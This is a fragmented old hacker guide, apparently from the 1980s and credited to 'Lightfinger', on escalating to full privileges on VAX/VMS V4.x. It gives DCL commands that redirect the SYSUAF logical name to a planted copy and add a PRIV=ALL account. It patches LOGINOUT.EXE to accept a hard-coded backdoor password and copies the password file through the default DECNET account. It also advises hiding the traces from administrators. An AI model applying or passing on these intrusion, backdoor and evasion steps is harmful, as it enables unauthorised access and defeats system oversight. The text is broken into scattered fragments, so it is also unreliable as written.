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o get SYSNAM privilege under V4.2 do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ET ACL/OBJ=LOGICAL/ACL=(ID=[???,???],ACCESS=READ+WRITE+DELETE+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NM$SYSTEM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 on all there tables that you need access to.  The problem with V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allows ACLs on logical name tables, but anyone can put them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[???,???] is your U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f you have another method of gaining SYSNAM priv you can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this ACL, you should be able to add an entry for SYSUA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executor mode name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EFINE/SYSTEM/EXEC SYSUAF $1$DISK1:[FRED]SYSU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ne a SET DEFAULT to [FRED] before hand and do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OPY SYS$SYSTEM:SYSUAF.DA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be able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RUN SYS$SYSTEM:AUTH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F&gt;ADD FRED/PASS=FRED/PRIV=ALL/FLAG=NODIS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F&gt;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I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now note that ANYONE logging onto the system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SYSUAF file in the [FRED] directory and NOT the SYS$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. also anyone doing a SHOW LOGICAL will see a new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table.. ie. "SYSUAF" = SYS$SYSDEVICE:[FRED]SYSU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now all ready to tes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ET HOS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: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y presto.. your logged in with FULL privileg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ntering an entry into the System logical table is a bit of a m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away of who is hacking the system it is a good idea to copy the sysu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system direcxtory, and ALTERING your OWN accou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rivs, doing this doesnt cause suspicsion if a new USERNAM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rite a DCL command procedure tha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Get SYSNAM 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nter the new logical name into the syste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a routine that is called from your login.com file tha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hecks for the SYSUAF entry in the syste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Deletes it if i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will make the new definition for SYSUAF only appear for a fr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of a second and will be very dificult to tra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logged into your own account with FULL privs..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.. (I have tested this method and it works really we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Another approach (or extension to the last method) by  getting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LOGINOUT.EXE in SYS$SYSTEM is the following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T DEFAULT SYS$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$PATCH LOGI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&gt;REPALCE/INSTRUCTION 9D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&gt;'MOVAB B^20(SP),B^1C(SP)'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&gt;'CMPL B^20(SP),#41414141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&gt;'BNEQ LBL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&gt;'MOVL I^#1,R0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&gt;'R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&gt;'LBL: MOVAB B^20(SP),B^1C(SP)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&gt;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INSTALL/REPLACE LOGIN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PURGE LOGINOU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logg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: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: ANY_ONE_WHO_EXISTS_ON_THIS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for V4.2 and V4.3, probably V4.1 as well, check if the MOVA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9D14 with EXAMIN/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On most machines you will find the following also works, (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ng protected file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y copy the SYSUAF.DAT file to your own directory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COPY NODE"DECNET DECNET"::SYS$SYSTEM:SYSUAF.DAT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NODE is your local node name (machine name, can be found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NETWORK, the current node is the top one in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bove doesnt work then try removing the second DECNET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words within the quotes are firstly the username and second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of an account that has NETWORK access, DECNET is likel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access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hacks are copyright of Lightfinger.     (c) 19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